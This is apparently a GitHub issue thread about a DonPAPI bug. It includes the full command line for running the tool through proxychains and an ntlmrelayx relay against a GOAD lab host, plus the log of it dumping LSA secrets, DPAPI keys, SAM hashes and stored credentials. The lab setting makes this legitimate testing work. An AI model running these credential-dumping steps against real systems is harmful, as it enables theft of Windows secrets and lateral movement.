Closed DummyKitty closed 5 days ago
But when I using version branch v1.0.2, everything is fine.
└─$ proxychains -f /etc/proxychains_1080.conf DonPAPI -no-pass NORTH/EDDARD.STARK@192.168.56.22
[proxychains] config file found: /etc/proxychains_1080.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Impacket v0.11.0 - Copyright 2023 Fortra
INFO Initializing database ./seatbelt.db
INFO Loaded 1 targets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
INFO [192.168.56.22] [+] CASTELBLACK (domain:north.sevenkingdoms.local) (Windows 10.0 Build 17763) [SMB Signing Disabled]
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
INFO host: \\192.168.56.98, user: eddard.stark, active: 5214, idle: 0
INFO host: \\192.168.56.98, user: robb.stark, active: 5268, idle: 5268
INFO [192.168.56.22] [+] Found user .NET v2.0
INFO [192.168.56.22] [+] Found user .NET v2.0 Classic
INFO [192.168.56.22] [+] Found user .NET v4.5
INFO [192.168.56.22] [+] Found user .NET v4.5 Classic
INFO [192.168.56.22] [+] Found user Administrator
INFO [192.168.56.22] [+] Found user All Users
INFO [192.168.56.22] [+] Found user Classic .NET AppPool
INFO [192.168.56.22] [+] Found user Default
INFO [192.168.56.22] [+] Found user Default User
INFO [192.168.56.22] [+] Found user Public
INFO [192.168.56.22] [+] Found user robb.stark
INFO [192.168.56.22] [+] Found user sql_svc
INFO [192.168.56.22] [+] Found user vagrant
INFO [192.168.56.22] [+] Dumping LSA Secrets
INFO [192.168.56.22] [+] LSA : vagrant : vagrant
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x6787e5397633e7f7ff26175df0cf21d9c5b55cf5
INFO [192.168.56.22] [-] Found DPAPI User key : 0x15b4b03bef61c9df3de901a855fd9320085f9e28
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x68921a34ad1633847c43f119d7b9371145a58f4c
INFO [192.168.56.22] [-] Found DPAPI User key : 0xb4045e1ea262dfe8f7497c03d748f29175cd5a0d
INFO [192.168.56.22] [+] LSA : NL$KM_history : 10a01429cde3435824372b048f67cdf38a962f6edda9f4c33e4bcb66faf65f17dbe3878d42b4bfaf2a9b90b84d6cdd8e611395ebc860971850ea2f5fdf271f37
INFO [192.168.56.22] [+] Dumping SAM Secrets
INFO [192.168.56.22] [+] SAM : Collected 6 hashes
INFO [192.168.56.22] [+] Gathering DPAPI Secret blobs on the target
INFO [192.168.56.22] [+]
[CREDENTIAL]
LastWritten : 2023-11-24 09:18:10
Flags : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x1 (CRED_PERSIST_SESSION)
Target : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown :
Username : 02odnqztzydhtbsm
Unknown3 :
INFO [192.168.56.22] [+]
[CREDENTIAL]
LastWritten : 2023-11-24 09:17:03
Flags : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x1 (CRED_PERSIST_SESSION)
Target : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown :
Username : 02kqimgougaimkhu
Unknown3 :
INFO [192.168.56.22] [+] Gathering Wifi Keys
INFO [192.168.56.22] [+] Gathering Vaults
INFO [192.168.56.22] [+] Gathering Chrome Secrets
INFO [192.168.56.22] [+] Gathering Mozilla Secrets
INFO [192.168.56.22] [+] Gathering VNC Passwords
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK
INFO [192.168.56.22] [+] Gathering mRemoteNG Secrets
INFO [192.168.56.22] [+] Gathering Recent Files and Desktop Files
/home/kali/.pyenv/versions/3.9.10/lib/python3.9/site-packages/LnkParse3-1.3.2-py3.9.egg/LnkParse3/target_factory.py:87: UserWarning: Unknown TargetID `195`
warnings.warn(msg)
INFO [+] Generating report
Should be fixed now. Feel free to reopen if this appends again
When I following the steps on GOAD, It turns out errors as follow:
While ntlmrelayx is listening on 1080: